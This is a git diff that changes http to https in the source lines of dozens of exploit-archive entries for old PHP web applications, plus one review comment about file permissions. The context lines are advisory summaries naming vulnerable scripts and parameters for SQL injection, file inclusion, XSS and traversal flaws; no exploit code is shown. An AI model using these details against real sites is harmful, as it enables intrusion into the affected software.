@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7406/info +// source: https://www.securityfocus.com/bid/7406/info XMB Forum Member.PHP has been reported prone to an SQL injection vulnerability, under certain conditions. diff --git a/exploits/php/webapps/22534.txt b/exploits/php/webapps/22534.txt index dc021495e..6ab224646 100644 --- a/exploits/php/webapps/22534.txt +++ b/exploits/php/webapps/22534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7427/info +source: https://www.securityfocus.com/bid/7427/info A vulnerability has been reported for Truegalerie that may result in unauthorized administrative access. The vulnerability exists due to insufficient sanitization of some URI values. diff --git a/exploits/php/webapps/22539.txt b/exploits/php/webapps/22539.txt index bff7f87bc..b920ec569 100644 --- a/exploits/php/webapps/22539.txt +++ b/exploits/php/webapps/22539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7434/info +source: https://www.securityfocus.com/bid/7434/info A HTML injection vulnerability has been discovered in Xoops. The problem occurs due to insufficient filtering of HTML and script code by the MyTextSanitizer script. diff --git a/exploits/php/webapps/22543.txt b/exploits/php/webapps/22543.txt index 3dd38e7cd..42780edba 100644 --- a/exploits/php/webapps/22543.txt +++ b/exploits/php/webapps/22543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7441/info +source: https://www.securityfocus.com/bid/7441/info OneCenter ForumOne 4.0 is a full-featured, web-based group discussion forum. diff --git a/exploits/php/webapps/22557.txt b/exploits/php/webapps/22557.txt index 56a4b5a17..10a9f2801 100644 --- a/exploits/php/webapps/22557.txt +++ b/exploits/php/webapps/22557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7483/info +source: https://www.securityfocus.com/bid/7483/info Splatt Forum is a public message board plugin designed to be used with PHPNuke. 
diff --git a/exploits/php/webapps/22558.txt b/exploits/php/webapps/22558.txt index ccdb7b000..de8d62886 100644 --- a/exploits/php/webapps/22558.txt +++ b/exploits/php/webapps/22558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7484/info +source: https://www.securityfocus.com/bid/7484/info A problem with Splatt Forum could allow remote users to execute arbitrary code in the context of the web site running the Splatt Forum module. The problem occurs due to the lack of sanitization performed on character representations of HTML tags. diff --git a/exploits/php/webapps/22577.txt b/exploits/php/webapps/22577.txt index 3f2299af9..d05142b0b 100644 --- a/exploits/php/webapps/22577.txt +++ b/exploits/php/webapps/22577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7542/info +source: https://www.securityfocus.com/bid/7542/info A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22578.txt b/exploits/php/webapps/22578.txt index 1d7d10f24..adeaf2528 100644 --- a/exploits/php/webapps/22578.txt +++ b/exploits/php/webapps/22578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7542/info +source: https://www.securityfocus.com/bid/7542/info A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22579.txt b/exploits/php/webapps/22579.txt index 40e88040d..91f6bd911 100644 --- a/exploits/php/webapps/22579.txt +++ b/exploits/php/webapps/22579.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7545/info +source: https://www.securityfocus.com/bid/7545/info An HTML injection issue has been reported which may lead to unauthorized code execution. diff --git a/exploits/php/webapps/22589.txt b/exploits/php/webapps/22589.txt index 444e70869..30d4baf9f 100644 --- a/exploits/php/webapps/22589.txt +++ b/exploits/php/webapps/22589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7558/info +source: https://www.securityfocus.com/bid/7558/info It has been reported that multiple input validation bugs exist in the Web_Links module used by PHPNuke. Because of this, a remote user may be able to access the database and potentially gain access to sensitive information. Successful exploitation could result in compromise of the web forums or more severe consequences. diff --git a/exploits/php/webapps/22595.txt b/exploits/php/webapps/22595.txt index 5f607b461..7bd224210 100644 --- a/exploits/php/webapps/22595.txt +++ b/exploits/php/webapps/22595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7570/info +source: https://www.securityfocus.com/bid/7570/info A cross site scripting vulnerability has been reported for PHP-Nuke. Specifically, PHP-Nuke does not sufficiently sanitize user-supplied input for the 'username' URI parameter to the modules.php script. diff --git a/exploits/php/webapps/22597.txt b/exploits/php/webapps/22597.txt index 9ff969e4a..7b53549d2 100644 --- a/exploits/php/webapps/22597.txt +++ b/exploits/php/webapps/22597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7588/info +source: https://www.securityfocus.com/bid/7588/info PHP-Nuke is reportedly prone to multiple SQL injection vulnerabilities in the Downloads module. Exploitation could allow for injection of malicious SQL syntax, resulting in modification of SQL query logic or other attacks. diff --git a/exploits/php/webapps/22598.txt b/exploits/php/webapps/22598.txt index 7899a133b..99f7ab23a 100644 
--- a/exploits/php/webapps/22598.txt +++ b/exploits/php/webapps/22598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7589/info +source: https://www.securityfocus.com/bid/7589/info The Web_Links module for PHP-Nuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. diff --git a/exploits/php/webapps/22599.html b/exploits/php/webapps/22599.html index f3f4333e1..1c3750a18 100644 --- a/exploits/php/webapps/22599.html +++ b/exploits/php/webapps/22599.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7594/info +source: https://www.securityfocus.com/bid/7594/info A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occur due to insufficient sanitization of private messages. As a result, an attacker may be capable of embedding malicious HTML or script code within a private message. This code may be interpreted by a legitimate user when previewing the message. diff --git a/exploits/php/webapps/22600.txt b/exploits/php/webapps/22600.txt index ccd58edec..60ce4b696 100644 --- a/exploits/php/webapps/22600.txt +++ b/exploits/php/webapps/22600.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7595/info +source: https://www.securityfocus.com/bid/7595/info Owl has been reported prone to an authentication bypass vulnerability. diff --git a/exploits/php/webapps/22603.txt b/exploits/php/webapps/22603.txt index 558f20148..e8bcf41b1 100644 --- a/exploits/php/webapps/22603.txt +++ b/exploits/php/webapps/22603.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7598/info +source: https://www.securityfocus.com/bid/7598/info A vulnerability has been reported for PHP-Proxima. The problem occurs in the autohtml.php script. Specifically, the script fails to verify the contents of a user-supplied variable before including a specified file into an HTML file. As a result, a malicious remote user may be capable of using this as a channel to disclose the contents of arbitrary local system files. diff --git a/exploits/php/webapps/22605.txt b/exploits/php/webapps/22605.txt index 832f8ba46..44ee3c2d1 100644 --- a/exploits/php/webapps/22605.txt +++ b/exploits/php/webapps/22605.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7609/info +source: https://www.securityfocus.com/bid/7609/info An SQL injection issue has been reported to affect OneOrZero Helpdesk. The error presents itself in a OneOrZero Helpdesk script that fails to sufficiently sanitize user-supplied input before including it in SQL queries. diff --git a/exploits/php/webapps/22606.py b/exploits/php/webapps/22606.py index e19774eb0..5c99aa07a 100755 --- a/exploits/php/webapps/22606.py +++ b/exploits/php/webapps/22606.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7611/info +source: https://www.securityfocus.com/bid/7611/info OneOrZero Helpdesk has been reported prone to an issue that may result in an attacker obtaining unauthorized administrative access. diff --git a/exploits/php/webapps/22607.txt b/exploits/php/webapps/22607.txt index beeaf8fcf..4a73d1ad4 100644 --- a/exploits/php/webapps/22607.txt +++ b/exploits/php/webapps/22607.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7616/info +source: https://www.securityfocus.com/bid/7616/info A cross-site scripting vulnerability has been reported for eZ publish. Specifically, eZ publish does not sufficiently sanitize user-supplied input supplied to the 'index.php' script. 
diff --git a/exploits/php/webapps/22612.txt b/exploits/php/webapps/22612.txt index 4fc6884e9..6d78de5a6 100644 --- a/exploits/php/webapps/22612.txt +++ b/exploits/php/webapps/22612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7625/info +source: https://www.securityfocus.com/bid/7625/info A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22618.txt b/exploits/php/webapps/22618.txt index 423aebf91..5131b420f 100644 --- a/exploits/php/webapps/22618.txt +++ b/exploits/php/webapps/22618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7634/info +source: https://www.securityfocus.com/bid/7634/info A problem with ttCMS/ttForum could make it possible for a remote user to launch SQL injection attacks. diff --git a/exploits/php/webapps/22625.txt b/exploits/php/webapps/22625.txt index 4fe67f61e..f9e17d905 100644 --- a/exploits/php/webapps/22625.txt +++ b/exploits/php/webapps/22625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7651/info +source: https://www.securityfocus.com/bid/7651/info A vulnerability has been reported for SudBox Boutique. The problem occurs due to insufficient initialization of variables and may allow an unauthorized user to gain authenticate. Specifically, by making a malicious request to the login.php script it may be possible to authenticate as the administrative user. diff --git a/exploits/php/webapps/22632.txt b/exploits/php/webapps/22632.txt index 62004ea66..ef0348718 100644 --- a/exploits/php/webapps/22632.txt +++ b/exploits/php/webapps/22632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7662/info +source: https://www.securityfocus.com/bid/7662/info XMB Forum has been reported prone to a cross-site scripting vulnerability. 
diff --git a/exploits/php/webapps/22641.txt b/exploits/php/webapps/22641.txt index 726eaf5f1..0c4d3f74d 100644 --- a/exploits/php/webapps/22641.txt +++ b/exploits/php/webapps/22641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7677/info +source: https://www.securityfocus.com/bid/7677/info It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server. diff --git a/exploits/php/webapps/22642.txt b/exploits/php/webapps/22642.txt index 0784cf43b..4fd81ac32 100644 --- a/exploits/php/webapps/22642.txt +++ b/exploits/php/webapps/22642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7678/info +source: https://www.securityfocus.com/bid/7678/info A vulnerability has been reported in Ultimate PHP Board. The problem is said to occur due to insufficient sanitization of user-supplied input before including log data into a PHP file. As a result, it may be possible for a remote attacker to execute arbitrary PHP commands within the context of the web server. The execution of these commands would only occur when an administrator chooses to view the log of forum activity via the 'admin_iplog.php' script. diff --git a/exploits/php/webapps/22651.txt b/exploits/php/webapps/22651.txt index 566fff21f..df7941187 100644 --- a/exploits/php/webapps/22651.txt +++ b/exploits/php/webapps/22651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7697/info +source: https://www.securityfocus.com/bid/7697/info A vulnerability has been discovered in PostNuke Phoenix v0.723 and earlier. Specifically, the Glossary module fails to sufficiently sanitize user-supplied input, making it prone to SQL injection attacks. diff --git a/exploits/php/webapps/22663.txt b/exploits/php/webapps/22663.txt index 0e87f11e2..9cfc8a230 100644 
--- a/exploits/php/webapps/22663.txt +++ b/exploits/php/webapps/22663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7705/info +source: https://www.securityfocus.com/bid/7705/info A vulnerability has been reported that could enable a member of the news system to create and access an administrative account. This is due to insufficient validation of data supplied to account editing input fields of Newsscript. diff --git a/exploits/php/webapps/22671.txt b/exploits/php/webapps/22671.txt index 3e5a219d8..e4a712021 100644 --- a/exploits/php/webapps/22671.txt +++ b/exploits/php/webapps/22671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7737/info +source: https://www.securityfocus.com/bid/7737/info Shoutbox is prone to directory traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to URI parameters. diff --git a/exploits/php/webapps/22672.txt b/exploits/php/webapps/22672.txt index ee827e372..13f554593 100644 --- a/exploits/php/webapps/22672.txt +++ b/exploits/php/webapps/22672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7738/info +source: https://www.securityfocus.com/bid/7738/info A remote file include vulnerability has been reported for Cafelog. Due to insufficient sanitization of some user-supplied variables by the 'blogger-2-b2.php' and 'gm-2-b2.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22675.txt b/exploits/php/webapps/22675.txt index 116fd2cc1..f87e260e3 100644 --- a/exploits/php/webapps/22675.txt +++ b/exploits/php/webapps/22675.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7742/info +source: https://www.securityfocus.com/bid/7742/info Geeklog is reported to be prone to SQL injection attacks during authentication. This is due to insufficient sanitization of cookie values, which could permit an attacker to inject SQL code. This issue could be exploited to compromise Geeklog or to potentially launch attacks against the database, allowing for disclosure of sensitive information or other consequences. diff --git a/exploits/php/webapps/22687.pl b/exploits/php/webapps/22687.pl index dc4d02035..339199145 100755 --- a/exploits/php/webapps/22687.pl +++ b/exploits/php/webapps/22687.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7746/info +source: https://www.securityfocus.com/bid/7746/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of the 'conf' URI parameter. diff --git a/exploits/php/webapps/22693.txt b/exploits/php/webapps/22693.txt index c3852d409..fbc7399bd 100644 --- a/exploits/php/webapps/22693.txt +++ b/exploits/php/webapps/22693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7758/info +source: https://www.securityfocus.com/bid/7758/info It has been reported that cPanel is prone to an issue where a remote attacker may bypass cPanel Formail-clone local domain checks and have untrusted e-mail delivered in the context of the vulnerable host. diff --git a/exploits/php/webapps/22702.pl b/exploits/php/webapps/22702.pl index 1c729f5c5..4f769467b 100755 --- a/exploits/php/webapps/22702.pl +++ b/exploits/php/webapps/22702.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7772/info +source: https://www.securityfocus.com/bid/7772/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of input into the expanded.php script. 
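Review bot: In exploits/php/webapps/22702.pl, and in 22687.pl a few hunks earlier, the rewritten `source:` line is line 1 of a file with mode 100755, and the context lines after it are plain advisory prose, so the file opens with neither a shebang nor a Perl comment. As this commit is already rewriting that line, consider commenting the header block (for example `# source: https://www.securityfocus.com/bid/7772/info`) so the script and its mode agree, or leave the text alone and drop the executable bit to match the .txt entries, which are 100644.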
diff --git a/exploits/php/webapps/22704.txt b/exploits/php/webapps/22704.txt index 16a1c642c..4e9521eb1 100644 --- a/exploits/php/webapps/22704.txt +++ b/exploits/php/webapps/22704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7774/info +source: https://www.securityfocus.com/bid/7774/info Webchat has been reported prone to a path disclosure weakness. diff --git a/exploits/php/webapps/22705.txt b/exploits/php/webapps/22705.txt index 05d869d72..9578e891c 100644 --- a/exploits/php/webapps/22705.txt +++ b/exploits/php/webapps/22705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7775/info +source: https://www.securityfocus.com/bid/7775/info A problem in Shoutbox may result in traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to the expanded.php script, and could allow the viewing of potentially sensitive files by attackers. diff --git a/exploits/php/webapps/22715.txt b/exploits/php/webapps/22715.txt index 854350e92..fd7aeb5e3 100644 --- a/exploits/php/webapps/22715.txt +++ b/exploits/php/webapps/22715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7777/info +source: https://www.securityfocus.com/bid/7777/info WebChat has been reported prone to a database username disclosure weakness. diff --git a/exploits/php/webapps/22716.txt b/exploits/php/webapps/22716.txt index 13050dfcd..25795001b 100644 --- a/exploits/php/webapps/22716.txt +++ b/exploits/php/webapps/22716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7779/info +source: https://www.securityfocus.com/bid/7779/info WebChat has been reported prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/22717.txt b/exploits/php/webapps/22717.txt index 67ade0508..d39a2ea19 100644 --- a/exploits/php/webapps/22717.txt +++ b/exploits/php/webapps/22717.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7780/info +source: https://www.securityfocus.com/bid/7780/info SPChat has been reported prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/22725.txt b/exploits/php/webapps/22725.txt index 79ad82dc3..30f2c4a49 100644 --- a/exploits/php/webapps/22725.txt +++ b/exploits/php/webapps/22725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7805/info +source: https://www.securityfocus.com/bid/7805/info Scripts that include the PHP phpinfo() debugging function may be prone to cross-site scripting attacks. This could permit remote attackers to create a malicious link to a vulnerable PHP script that includes hostile client-side script code or HTML. If this link is visited, the attacker-supplied code may be rendered in the browser of the user who visit the malicious link. diff --git a/exploits/php/webapps/22750.txt b/exploits/php/webapps/22750.txt index 3c9db7b82..c8ffe2865 100644 --- a/exploits/php/webapps/22750.txt +++ b/exploits/php/webapps/22750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7843/info +source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22760.txt b/exploits/php/webapps/22760.txt index 59a925912..5da444f57 100644 --- a/exploits/php/webapps/22760.txt +++ b/exploits/php/webapps/22760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7896/info +source: https://www.securityfocus.com/bid/7896/info Sphera HostingDirector VDS Control Panel has been reported prone to a vulnerability where an attacker may make arbitrary account configuration modifications. diff --git a/exploits/php/webapps/22761.txt b/exploits/php/webapps/22761.txt index 45fa14354..0e1a501bf 100644 
--- a/exploits/php/webapps/22761.txt +++ b/exploits/php/webapps/22761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7898/info +source: https://www.securityfocus.com/bid/7898/info The PostNuke 'modules.php' script does not sufficiently sanitize data supplied via URI parameters, making it prone to cross-site scripting attacks. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code. diff --git a/exploits/php/webapps/22762.txt b/exploits/php/webapps/22762.txt index e124fc72c..6599ade60 100644 --- a/exploits/php/webapps/22762.txt +++ b/exploits/php/webapps/22762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7899/info +source: https://www.securityfocus.com/bid/7899/info Sphera HostingDirector VDS Control Panel has been reported prone to several cross-site scripting attacks. The vulnerabilities exist due to insufficient sanitization of user-supplied input for certain URI parameters. diff --git a/exploits/php/webapps/22767.txt b/exploits/php/webapps/22767.txt index 5a15ec46a..037cae473 100644 --- a/exploits/php/webapps/22767.txt +++ b/exploits/php/webapps/22767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7901/info +source: https://www.securityfocus.com/bid/7901/info The PostNuke 'user.php' script does not sufficiently sanitize data supplied via URI parameters, making it prone to cross-site scripting attacks. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code. diff --git a/exploits/php/webapps/22776.txt b/exploits/php/webapps/22776.txt index e418cb75f..2239d50c6 100644 --- a/exploits/php/webapps/22776.txt +++ b/exploits/php/webapps/22776.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7919/info +source: https://www.securityfocus.com/bid/7919/info It has been reported that PMachine does not properly handle include files under some circumstances. Because of this, an attacker may be able to remotely execute commands. diff --git a/exploits/php/webapps/22791.txt b/exploits/php/webapps/22791.txt index 57d26c00f..b93597946 100644 --- a/exploits/php/webapps/22791.txt +++ b/exploits/php/webapps/22791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7952/info +source: https://www.securityfocus.com/bid/7952/info Multiple vulnerabilities have been reported for Squirrelmail which could allow for information disclosure, data corruption, and privilege escalation. diff --git a/exploits/php/webapps/22792.txt b/exploits/php/webapps/22792.txt index f9bae1299..60da334d6 100644 --- a/exploits/php/webapps/22792.txt +++ b/exploits/php/webapps/22792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7952/info +source: https://www.securityfocus.com/bid/7952/info Multiple vulnerabilities have been reported for Squirrelmail which could allow for information disclosure, data corruption, and privilege escalation. diff --git a/exploits/php/webapps/22793.txt b/exploits/php/webapps/22793.txt index 88577bcda..1923d88e7 100644 --- a/exploits/php/webapps/22793.txt +++ b/exploits/php/webapps/22793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7952/info +source: https://www.securityfocus.com/bid/7952/info Multiple vulnerabilities have been reported for Squirrelmail which could allow for information disclosure, data corruption, and privilege escalation. diff --git a/exploits/php/webapps/22798.txt b/exploits/php/webapps/22798.txt index 88c6320d8..2224b81d3 100644 --- a/exploits/php/webapps/22798.txt +++ b/exploits/php/webapps/22798.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7963/info +source: https://www.securityfocus.com/bid/7963/info A vulnerability has been reported for phpMyAdmin that may reveal the contents of directories to remote attackers. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, dot-dot-slash '../' directory traversal sequences are not sufficiently sanitized from URI parameters. diff --git a/exploits/php/webapps/22808.txt b/exploits/php/webapps/22808.txt index de2fa867c..55f1bbba4 100644 --- a/exploits/php/webapps/22808.txt +++ b/exploits/php/webapps/22808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7980/info +source: https://www.securityfocus.com/bid/7980/info It has been reported that pMachine is prone to remote a patch disclosure vulnerability when accessing various scripts. diff --git a/exploits/php/webapps/22809.txt b/exploits/php/webapps/22809.txt index 9aa80e287..f3b03b0f6 100644 --- a/exploits/php/webapps/22809.txt +++ b/exploits/php/webapps/22809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7980/info +source: https://www.securityfocus.com/bid/7980/info It has been reported that pMachine is prone to remote a patch disclosure vulnerability when accessing various scripts. diff --git a/exploits/php/webapps/22810.txt b/exploits/php/webapps/22810.txt index 3027e213e..00a8645dc 100644 --- a/exploits/php/webapps/22810.txt +++ b/exploits/php/webapps/22810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7981/info +source: https://www.securityfocus.com/bid/7981/info Reportedly, pMachine is vulnerable to a cross-site scripting attack. The vulnerability is present in the search module. The issue presents itself likely due to insufficient sanitization performed on user-supplied data that is passed as the query to the affected module. diff --git a/exploits/php/webapps/22812.txt b/exploits/php/webapps/22812.txt index 955065d97..c867a9039 100644 
--- a/exploits/php/webapps/22812.txt +++ b/exploits/php/webapps/22812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7995/info +source: https://www.securityfocus.com/bid/7995/info A vulnerability has been reported for Filemanager that may result in the disclosure of arbitrary files. The vulnerability exists due to insufficient sanitization of user-supplied values for URI parameters. diff --git a/exploits/php/webapps/22818.txt b/exploits/php/webapps/22818.txt index 7cd78abe5..10fbf97bd 100644 --- a/exploits/php/webapps/22818.txt +++ b/exploits/php/webapps/22818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8011/info +source: https://www.securityfocus.com/bid/8011/info It has been reported that Tutos does not properly handle input to the file_select script. Because of this, an attacker may be able to execute code in the browser of another user with the privileges of the vulnerable site. diff --git a/exploits/php/webapps/22819.txt b/exploits/php/webapps/22819.txt index ff3d18d42..beca9a11c 100644 --- a/exploits/php/webapps/22819.txt +++ b/exploits/php/webapps/22819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8012/info +source: https://www.securityfocus.com/bid/8012/info It has been reported that Tutos does not properly handle input to the file_new script. Because of this, an attacker may be able to upload arbitrary files to a vulnerable site. diff --git a/exploits/php/webapps/22820.txt b/exploits/php/webapps/22820.txt index 2abf578cf..54456557f 100644 --- a/exploits/php/webapps/22820.txt +++ b/exploits/php/webapps/22820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8013/info +source: https://www.securityfocus.com/bid/8013/info XMB Forum has been reported prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sanitize user-supplied data. diff --git a/exploits/php/webapps/22821.txt b/exploits/php/webapps/22821.txt index 672263b3d..70264048c 100644 
--- a/exploits/php/webapps/22821.txt +++ b/exploits/php/webapps/22821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8013/info +source: https://www.securityfocus.com/bid/8013/info XMB Forum has been reported prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sanitize user-supplied data. diff --git a/exploits/php/webapps/22826.txt b/exploits/php/webapps/22826.txt index e8c8bc369..d0e19ac05 100644 --- a/exploits/php/webapps/22826.txt +++ b/exploits/php/webapps/22826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8018/info +source: https://www.securityfocus.com/bid/8018/info VisNetic WebMail is prone to an information disclosure vulnerability. Reportedly, by appending a dot '.' character to the end of a URI request to WebMail, the source code of PHP files may be returned in the web browser. diff --git a/exploits/php/webapps/22841.txt b/exploits/php/webapps/22841.txt index b9017b984..c628b00bd 100644 --- a/exploits/php/webapps/22841.txt +++ b/exploits/php/webapps/22841.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8046/info +source: https://www.securityfocus.com/bid/8046/info A vulnerability has been reported for iXmail that may allow for the deletion of files. The vulnerability occurs due to insufficient sanitization of user-supplied input for certain URI parameters. diff --git a/exploits/php/webapps/22842.txt b/exploits/php/webapps/22842.txt index 58d26fcfb..845115406 100644 --- a/exploits/php/webapps/22842.txt +++ b/exploits/php/webapps/22842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8060/info +source: https://www.securityfocus.com/bid/8060/info CutePHP is prone to HTML injection attacks. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, user-supplied input to news posts are not sufficiently sanitized of malicious HTML code. 
diff --git a/exploits/php/webapps/22845.txt b/exploits/php/webapps/22845.txt index f040889d5..0e82bbc1d 100644 --- a/exploits/php/webapps/22845.txt +++ b/exploits/php/webapps/22845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8067/info +source: https://www.securityfocus.com/bid/8067/info paBox is prone to an issue that may allow unauthenticated remote users to reset administrative passwords. This could permit unauthorized access to the administrative Control Panel. diff --git a/exploits/php/webapps/22874.txt b/exploits/php/webapps/22874.txt index 6a8640292..b16af5451 100644 --- a/exploits/php/webapps/22874.txt +++ b/exploits/php/webapps/22874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8119/info +source: https://www.securityfocus.com/bid/8119/info cPanel is prone to an HTML injection vulnerability. It is possible for remote attacks to include hostile HTML and script code in requests to cPanel, which will be logged. When logs are viewed by an administrative user, the injected code could be rendered in their browser in the context of the site hosting cPanel. diff --git a/exploits/php/webapps/22886.txt b/exploits/php/webapps/22886.txt index 2ed719165..89fe2317d 100644 --- a/exploits/php/webapps/22886.txt +++ b/exploits/php/webapps/22886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8155/info +source: https://www.securityfocus.com/bid/8155/info It has been reported that a problem in ChangshinSoft ezTrans Server exists in the download.php script that may allow an attacker to view arbitrary files. This may result in the disclosure of potentially sensitive information. diff --git a/exploits/php/webapps/22887.txt b/exploits/php/webapps/22887.txt index b1bf2e92a..fa6c1ae37 100644 --- a/exploits/php/webapps/22887.txt +++ b/exploits/php/webapps/22887.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8158/info +source: https://www.securityfocus.com/bid/8158/info phpForum is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. This could be exploited to execute malicious PHP commands in the context of the web server process. diff --git a/exploits/php/webapps/22896.txt b/exploits/php/webapps/22896.txt index cbc982965..3dfdb3a04 100644 --- a/exploits/php/webapps/22896.txt +++ b/exploits/php/webapps/22896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8174/info +source: https://www.securityfocus.com/bid/8174/info A vulnerability has been reported in htmltonuke that may result in web code execution in the browser of visiting users. This code would be executed in the security context of the site hosting the vulnerable script. diff --git a/exploits/php/webapps/22901.txt b/exploits/php/webapps/22901.txt index 6e17dcfd5..5cf874a80 100644 --- a/exploits/php/webapps/22901.txt +++ b/exploits/php/webapps/22901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8188/info +source: https://www.securityfocus.com/bid/8188/info It has been alleged that BlazeBoard fails to adequately protect the contents of a directory in a default install. It is therefore possible for remote users to request files from this directory. This could expose sensitive information stored in these directories to remote attackers. diff --git a/exploits/php/webapps/22910.html b/exploits/php/webapps/22910.html index cd4a03ce8..5d6eec855 100644 --- a/exploits/php/webapps/22910.html +++ b/exploits/php/webapps/22910.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8198/info +source: https://www.securityfocus.com/bid/8198/info Splatt Forum has been reported prone to a HTML injection vulnerability. diff --git a/exploits/php/webapps/22922.txt b/exploits/php/webapps/22922.txt index a8894244c..7203c734c 100644 --- a/exploits/php/webapps/22922.txt 
